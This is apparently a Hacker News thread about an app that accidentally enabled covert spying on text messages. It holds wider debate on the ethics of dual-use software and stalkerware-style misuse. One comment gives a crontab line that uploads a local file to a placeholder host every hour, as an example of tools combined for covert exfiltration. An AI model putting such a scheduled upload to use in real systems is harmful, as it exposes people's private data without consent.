Hacker News
I accidentally built a spying app (withblue.ink)
176 points by akeck on Dec 5, 2020 | 60 comments



One time a friend and I built an app for a weekend hackathon competition called Rails Rumble.

At the time (2010), link shortening services were all the rage, but they were being used to obfuscate malware links. To fight this, we wanted to create a link shortening service that couldn't be used for malware. Instead of redirecting to a webpage, it broke the page apart into its core elements so you could see what it was about before you visited it. If the site had photos, we even put them into a nice looking image gallery that you could peruse.

We finished the project in 72 hours and got an honorable mention for the competition, but we didn't win. A month later, our free server hosting we were given for the competition was about to expire. I logged in to spin the whole thing down.

Poking around the DB a bit, I realized our little weekend project had thousands of links shortened and the traffic for the site was actually exceeding the limits of the server. Looking at the URLs, I realized they all had one thing in common; they were all porn sites. The simple inclusion of the image gallery had inadvertently created a porn scraping service. It was like your browser's reader view, but perfect for adult sites!

It was so obvious in retrospect, but sometimes in your rush to build an idea, you can be completely blind to its true nature. This time it was amusing, but the next time it could be dangerous, and the lesson always stuck with me.


We just wanted to build a gif-making app for a hackathon.

You could search for and browse movies by clicking on directors, actors and other staff, download a movie with one click, preview it to select what you want to clip, and make a gif out of it.

Turns out it was a very convenient interface to discover, download, and view movies. All we had to do was build a front-end to TMDb, a torrent search scraper, and a layer between the Transmission CLI and the front-end.

We inadvertently built a Popcorn Time clone in a day.


Reminds me of Firefox Send.

Found myself in a situation needing it a few weeks ago and was like, ugh, what do I do now.


I swear Mozilla misses out on a ton of opportunities to make money and fund MDN / Firefox properly. They need to stop making free services and charge money for services that will fund the open-source projects in their foundation, or else finally donate them to a real org that will actually maintain the projects in question.


Firefox Send had a known malware problem for a while, but when it was used to successfully target an NGO, the pressure forced Mozilla to pull the plug. At least that’s the version that’s publicly available.

If Firefox had used something other than firefox.com, the brand trust could have been decoupled from the service, but by offering it for free they received PR. A Catch-22, I think.

The nature of Mozilla not having access to the files eliminated any sort of scanning/vetting and malicious actors quickly exploited it.

If Firefox had decided to charge for Send, I’m sure fraudulent payments would have been used to procure accounts intended for malware. Charging could have helped expire malicious links before unsuspecting users clicked them, but it wouldn’t have completely addressed the issue.


I think paras 2&3 were also the curse: firefox.com was a “good neighbourhood”, which made it convenient/accessible, but that’s good for the whole spectrum of actors.

I guess this is why most no-account file hosting is on sketchy sites.


There's still a working donation-supported command-line-focused version of it here [1] for anyone who doesn't know!

[1] https://github.com/timvisee/ffsend


Thanks for linking ffsend! You can also use it in your browser, like Send, at `send.vis.ee`.

ffsend uses this host, but I don't widely advertise its address, to prevent overloading the server with spam.


The year is 2020 and transferring files between devices is still hard.

I think a decade ago I started paying ~$5 a month for a server at OVH with a lot of storage. SSH/FileZilla plus Nginx on an obfuscated URL has solved a lot of my problems. I also use it as a server to test Docker images, as a VPN when I want a French IP, as a picture backup server, and to host a professional presentation website.
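The "Nginx on an obfuscated URL" trick above can be a single location block. This is a minimal sketch; the domain, the random path slug, and the directory are all placeholders:

```nginx
server {
    listen 443 ssl;
    server_name files.example.com;   # placeholder domain

    # A hard-to-guess path segment acts as a weak shared secret.
    location /f9c2a7e1/ {
        alias /srv/files/;           # directory being shared
        autoindex on;                # simple directory listing (optional)
    }
}
```

This is security by obscurity, of course; for anything sensitive you would add basic auth or client certificates on top.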

The free email account I have been using since the '90s is now telling me it is almost full, so I am considering switching.

Really, storage is cheap but it is not free. Save yourself a lot of hassle: pay for it yourself and take back control.


I am working on a pet project: an application that would allow people to share files for a limited time via short URLs.

Do you think that would be useful to many people?


Did you ever open source the project? I can see it being useful in a more limited context.



Thinking “how can this technology be used by stalkers, harassers, abusive partners” and so forth is something I didn’t think about when I was young, but always consider now.

Having more diverse voices in your team and in your life is a big part of getting better at this stuff.


What are some things a startup founder can do to foster a culture of diversity and inclusivity?


Focus on diversity of perspective as opposed to superficial diversity. For example, a second-generation Taiwanese American can bring a very different perspective from that of a Taiwanese immigrant. The latter is more likely to bring something unique to the table.


Fully agree. Deep diversity is better than superficial diversity.

But if you’re starting from a position with almost no diversity even seemingly “superficial” measures can help you move forward. You can’t turn around and tick a box and say “well that’s diversity taken care of!” But it’s a step on the journey.

(And the journey isn’t “being diverse”, it’s “making good things that aren’t accidentally riddled with blind spots”)


i just wanted to save this here. good point.


Fortunately, HN has a feature to allow you to do that without polluting threads with useless comments: just click on the "timestamp" of the comment (next to the username) and then click on "favorite".

In the future, you can view all of your "favorite" comments from your profile page (click on your username in the top-right of the page). As an added bonus, it's much easier than having to sift through your own comments to find that one specific thread you're looking for.


Also, browsers have bookmark features.


Hire outside your bubble. Hire people from non-elite schools who have amazing/interesting projects or clear success in spite of struggles or poor odds.


Make sure to include diversity of opinion in your hiring criteria so as to avoid creating a bubble. This is true diversity as opposed to identity-based "diversity". Make sure to get people who themselves are open for true diversity as well, otherwise you risk creating factions inside your company.


Favor people that don't fit your mold. Hang out with people that aren't your usual group. Hang out in an underground community (not literally underground, more like subcultures)


So far it looks like "Don't Hire Who Drinks Your Kool-Aid".

Kool-Aid is good for some of your group.

The opposite is also good for your group.


In the last 25 years I've experienced the journey from a staff count of 6 to a staff count of 100 three times, at different companies (a service provider, a professional-services firm, and a software vendor).

Your first hires determine largely your culture. The people that end up creating teams, and that eventually hire and influence people themselves, make your culture.


Perhaps care less about “culture fit” in hiring? If you only hire people who think the way you do, the results are obviously not diverse.


> I implemented a new feature: the ability to upload texts automatically, in background, without user intervention.

> I had, unknowingly and unwillingly, built a spying tool, and a really convenient and efficient one.

> Thanks to background uploads, people could install the YouArchive.It app on another person’s iPhone, set it up, maybe even hide it (something possible on a jailbroken iPhone), and then watch as the text messages come in, almost real-time. Jealous partners, stalkers and the likes could install this tool on an unknowing victim’s phone with relative ease.

...

This hit home: the (otherwise absolutely fantastic) NextDNS (and anything similar to it) comes pretty close to a spying app, too (300,000 DNS requests per month conveniently stored for a long time, for free). I know a handful of people to whom I introduced NextDNS as a privacy-enhancing service who ended up using it to encroach on privacy by configuring it on unsuspecting users' Androids and iPhones (it doesn't even require jailbreak or root, and it runs forever in the "background").


You can run people over with cars, electrocute them with electricity. This doesn't mean we should never have built cars or generators.

The more powerful and impactful something is, the greater the potential for abuse. You don't even need that something to be abused - bad people benefited from electricity just as much as good people. This doesn't mean we should stop building powerful and impactful things, or think of ways to restrict them such that only the "good guys" can benefit.


Both cars and electrical infrastructure have a ton of safety mechanisms built into them to reduce the potential for harm, many required by law.

For cars we have seatbelts, airbags, traffic lights, speed limits, guard rails on mountain roads, and you have to undergo training and certification before you're allowed to get a license. All cars have numberplates for tracking, and identifying these in CCTV and dashcam footage can be useful in identifying those who have caused accidents or other damage. Vehicle manufacturers have a lot of regulations that they have to comply with.

For electrical distribution networks and equipment there are also many safety mechanisms in place, such as insulation, circuit breakers, surge protectors, and lots of regulations covering the installation of electrical wiring in buildings. While growing up, everyone learns of the potential dangers of electricity, e.g. don't stick a fork in a socket and keep that hairdryer away from the bath tub. Similarly everyone knows the damage and trauma that can result from car accidents.

The same is not currently true of social media. I don't know what the right answer is regarding regulation - I'm wary of unforeseen negative consequences it may have and the potential for it to be poorly thought out. But I think education on how to use social media responsibly is important. Things like: be careful about how much information you share about yourself, don't believe everything you read (check to see if the source of news is reliable), learn how to identify fake news and propaganda, and even how to decide whether to opt out of using certain services altogether.

I agree with your main argument, but it's overly simplistic - we should think about how to achieve the benefits of new technologies while minimising the costs.


All of these safety measures were developed through trials and iterative improvements, not foreseen by the inventors. That's because it's difficult, if not impossible, to accurately predict the impact of a revolutionary product at the outset. It's hard enough predicting whether something will be revolutionary, much less its impact.

This iterative process is working fine for social media. The platforms are changing, how the users use them is changing, it just needs more time to mature.


You absolutely should think about the ways the things you create can be used to harm other people, and take steps to mitigate that.


I agree, the authors of cron and wget/curl should have taken steps to protect people from having their privacy invaded by others who use these tools.


I don't really understand why three separate people have decided to attack the exact same strawman of my argument. Read my response to the other commenter?


Attack? I said that I agree.


I'm guessing this is sarcasm, given these tools predate modern social networks and serve such a fundamental feature as "Save Page", which browsers already have.


cron doesn't do that. As for curl/wget, both can be used to do all kinds of things other than just "Save Page". Consider combining cron and curl to upload a file to a server every hour, or to download and execute some sort of backdoor script. Whether they predate modern social networks or not is irrelevant.
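As a concrete illustration of that combination, a single crontab line is enough to upload a file every hour. This is a hypothetical example; the path and example.com URL are placeholders:

```shell
# m h dom mon dow  command
# Every hour, on the hour, PUT a local file to a remote server.
0 * * * *  curl -s -T /home/user/notes.txt https://example.com/upload/
```

The point being that neither cron nor curl is a "spying tool", yet two benign general-purpose tools compose into one trivially.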


[flagged]


I mean, I do own a rubber mallet - it's quite good for what it does!

But, no, I would buy a tool that fits my purpose. If my purpose is to hit a baseball, or hammer in a nail, I'd buy a real bat, or a real hammer, because that's the purpose of the tool.

If my goal was to swing it at a friend, though, I'd probably go for the foam bat. Just like, if my purpose was to build a piece of software to archive emails, I would build it so as that it is clearly its purpose, and it would be engineered in a way to make it challenging if not impossible to be used to secretly abscond with someone else's conversations.

You seem to be interpreting my response as "people shouldn't build tools that can be used for dangerous purposes", when instead I am saying, "you should understand, and take steps to ensure, that the tools you create are used for their intended purpose." Hopefully that purpose isn't spying on people, but if it is, be up-front about it!


> and it would be engineered in a way to make it challenging if not impossible to be used to secretly abscond with someone else's conversations.

... Thereby ensuring that it is more difficult or inconvenient for legitimate users (access prompts and notifications are cheap, not free). It's a potentially legitimate tradeoff, but it is a trade; the question is whether it's closer to enforcing sane password requirements online (probably necessary), or aliasing rm to rm -i (helpful right up until you actually need to delete 300 files at once).


No, but if I were a bat designer, I would be hesitant to sell a baseball bat full of nails under the guise of "meat tenderizer". Even though it may actually work as intended (tenderizing steaks), the way it is most likely to actually be used the majority of the time so obviously overshadows that purpose that the product probably shouldn't be created, let alone sold.


We put age restriction labels on toys and require licenses to drive a car.


There is no licensing requirement whatsoever to drive on private property, nor any form of registration required.

As for "age-restriction" labels, they are merely at the parents' discretion. I don't think a toy store would ask for ID and refuse a sale if the age indications were not met.


I would prefer my knives have sharp points on them, despite the fact that they can be used to stab. I do not want general purpose tools "mitigated" because some people could use them to harm other people.

I want my tools to be sharp, pointy, and effective.

Blunt your own tools, but don't tell me what I can do with mine, please.


>You can run people over with cars, electrocute them with electricity. This doesn't mean we should never have built cars or generators.

You should still think about how a car or a generator could hurt someone when you're building one, right? That's how we got crosswalks and fuses.


Electricity is definitely good, but cars certainly have alternatives with various tradeoffs.

Electricity is also especially amusing in the US because we picked the frequency of AC current that requires the least juice to stop your heart. Other countries picked slightly different frequencies....


Facebook can tune the algorithm to stop polarizing viewpoints. YouTube can better vet the video content that gets posted, (they find porn with eerie accuracy, but can’t identify anything else that might not be good to spread?). Instagram can promote positivity about all parts of life instead of idolization of beauty and riches. Twitter can ban someone who constantly breaks the terms of service, instead of making them a specific loophole.

None of these platforms are going to improve though. The money that they make is now closely entwined with what started out as unintended consequences and those consequences are well known. And that just makes them intended consequences.

The author shut their service down when they realized the harm it was doing. They could have solved it other ways as well. Social media and other companies could fix their unintended consequences too, but aren’t likely to so long as money and engagement are the primary metrics of success of a business.


There is an interesting ethics discussion here, because FB could, for example, tune their algorithms to avoid polarization by presenting users who hold extreme views with content that wouldn't validate those views, instead showing them a more moderate, fact-based, scientifically sound and politically correct view. But would that be ethical? Who would be the one to choose what "the correct view" is? Right now FB is doing harm while being somewhat fair, by showing people what "they want to see": it is their behaviors telling the algorithms what they want, not a third party, even if what they want is wrong/toxic.


Academic studies in this area would help. I'm curious why we don't see more of them.


This is almost like "think of the children" in regards to enabling users to do stuff with their own phone.

Yes, if you know how to jailbreak an iPhone and have physical access to the other person's phone, you can spy on them. You are already "on the other side of the airtight hatch". I don't think there are technical solutions to having physical control of a person and their phone.

Tech people often want to imagine a perfect technical solution to a problem, but many times you need legal and social solutions.


I don't see how this is "think of the children"? The point is that we need to be cognizant of how the things we build can be (ab)used.


It’s this thinking about how things can be abused that is behind calls to ban encryption or for ISPs to be filtered, or for Torrents to be banned.

Every powerful tool can be abused. In fact, the more powerful it is, the more it can be abused. The abuse of the tool is the responsibility of the person abusing it.

We don’t require baseball bat or hammer manufacturers to think about how their product can be abused, even though baseball bats and hammers have been used to murder people before.


> It’s this thinking about how things can be abused that is behind calls to ban encryption or for ISPs to be filtered, or for Torrents to be banned.

You skipped the slippery slope and went straight to the scariest outcome. That isn't healthy.

https://en.m.wikipedia.org/wiki/Splitting_(psychology)


You said "many times you need legal or social solutions", but now you're dismissing legal and social solutions.

Most people on here will agree that banning encryption is going too far. But it's ridiculous to use the worst-case solution as a pretext to avoid even thinking about the problem.


Maybe they're just saying that "think of the possible uses" needs to be applied to itself -- "think of the possible uses of claiming to think of the possible uses."


> Most people on here will agree that banning encryption is going too far.

Are we talking about the same people, many among us here, who have no problem manipulating content to fit their views and banning Free Speech? It's a bit of a hypocritical argument...

You are placing an almost legal liability on engineers to ensure the tool will only be used to fit their definition of "good", which is a problem in itself.

Gun makers are not responsible for mass shootings. The ill-intentioned shooters are the only ones responsible for their actions.


You're saying it's a problem to ask engineers to make sure their tools will only be used for their definition of "good". But you also imply that tools should uphold "Free Speech", which is exactly that — fitting someone's definition of "good". So which is it?


Is someone saying tools shouldn’t be made? It’s good for engineers to think about how tools they make could be abused to mitigate damage.

In a case like this, the developer could have added some periodic notification to the device or require the device user to rotate a code or reauth with the service periodically to limit abuse.
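The "periodic reauth" idea above can be sketched in a few lines. This is a hypothetical illustration, not the app's actual code; the one-week interval and the function names are assumptions:

```python
import time

# Assumed policy: a session must be re-confirmed on the device itself
# every week, so an app set up by someone else can't upload silently forever.
REAUTH_INTERVAL_SECONDS = 7 * 24 * 3600


def needs_reauth(last_auth_ts, now=None):
    """Return True when the session is stale and the on-device user
    must confirm their credentials before background uploads continue."""
    if now is None:
        now = time.time()
    return (now - last_auth_ts) > REAUTH_INTERVAL_SECONDS


# Example: a session last authenticated eight days ago is stale.
eight_days_ago = time.time() - 8 * 24 * 3600
assert needs_reauth(eight_days_ago)
```

Paired with a visible notification when reauth is due, a check like this doesn't stop a determined abuser, but it does keep the app from being a silent, indefinite tap.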

Can you think of a modification like that you could implement on a baseball bat? Of course not. It's merely a straw man.


I'm not so sure I like where the rest of this argument is going, but I do want to support the idea that there are probably a zillion ways to spy on and otherwise abuse somebody if you can get them to use an iPhone that you jailbroke and installed some off-App-Store software on.

Maybe it's better to come up with some lesser way to discourage people from using this kind of software on somebody else's phone without their knowledge than shutting down the whole service entirely.


At least you got in early on those PLTR stock options


And to this day you can't export your iMessages in any official way.


Well, stop doing that.


You could’ve made the same point in a post 1/10 the length.



